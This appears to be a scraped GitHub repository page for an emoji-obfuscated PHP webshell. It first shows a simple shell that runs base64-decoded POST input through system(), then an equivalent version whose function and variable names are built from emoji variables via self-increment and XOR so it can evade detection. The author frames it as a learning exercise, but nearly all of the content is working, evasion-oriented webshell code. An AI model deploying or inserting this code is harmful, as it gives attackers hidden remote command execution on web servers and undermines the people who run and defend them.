Mr-xn / php-emoji-webshell

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

php-emoji-webshell

๐Ÿฅธ Nothing new about this webshell, just use same techniques like XOR and self increment operations.

Basically this code

<?php

$a = $_POST[4] ? base64_decode($_POST[4]) : 'whoami';
@system($a);

Turn into emoji, self increment and XOR operations.

<?php

$_=[];
$_=@"$_";
$__=("_"=="_")+("_"=="_");
$_=@$_[++$__];

$๐ŸŒ=$_++;
$๐Ÿคฎ=$_++;
$๐Ÿช=$_++;
$๐Ÿซฃ=$_++;
$๐Ÿง=$_++;
$๐ŸŽ‚=$_++;
$๐Ÿฅƒ=$_++;
$๐Ÿ”=$_++;
$๐ŸŒ˜=$_++;
$๐ŸŒ—=$_++;
$๐ŸŒ–=$_++;
$๐ŸŒ•=$_++;
$๐ŸŒ’=$_++;
$๐ŸŒ“=$_++;
$๐ŸŒ”=$_++;
$๐ŸŒฐ=$_++;
$๐Ÿ˜=$_++;
$๐Ÿฅ—=$_++;
$๐Ÿฅฅ=$_++;
$๐Ÿ‘=$_++;
$๐Ÿ‹=$_++;
$๐Ÿง‡=$_++;
$๐ŸŒฎ=$_++;
$๐Ÿ•=$_++;
$๐Ÿฅฏ=$_++;
$๐Ÿฃ=$_;

$__++;
$__++;
$__++;
$๐Ÿ‘ฟ=$๐Ÿคฎ.$๐ŸŒ.$๐Ÿฅฅ.$๐Ÿง.$__;
$__--;
$__--;
$๐Ÿ‘ฟ.=$__.("#"^"|").$๐Ÿซฃ.$๐Ÿง.$๐Ÿช.$๐ŸŒ”.$๐Ÿซฃ.$๐Ÿง;

$๐Ÿ’€=$๐Ÿฅฅ.$๐Ÿฅฏ.$๐Ÿฅฅ.$๐Ÿ‘.$๐Ÿง.$๐ŸŒ’;
$๐Ÿฅณ=("#"^"|").($๐Ÿฅฅ^"#").($๐ŸŒ•^"#").($๐ŸŒฐ^"#").($๐ŸŒฎ^"#"); 
$๐Ÿคฏ=@${$๐Ÿฅณ}[$__] ? $๐Ÿ‘ฟ(@${$๐Ÿฅณ}[$__]) : $๐ŸŒฎ.$๐Ÿ”.$๐ŸŒ”.$๐ŸŒ.$๐ŸŒ’.$๐ŸŒ˜;
@$๐Ÿ’€($๐Ÿคฏ);

Im just building this for fun and for the sake of learning new things. โ˜•๏ธ๐Ÿฅฏ

About


Languages

Language:PHP 100.0%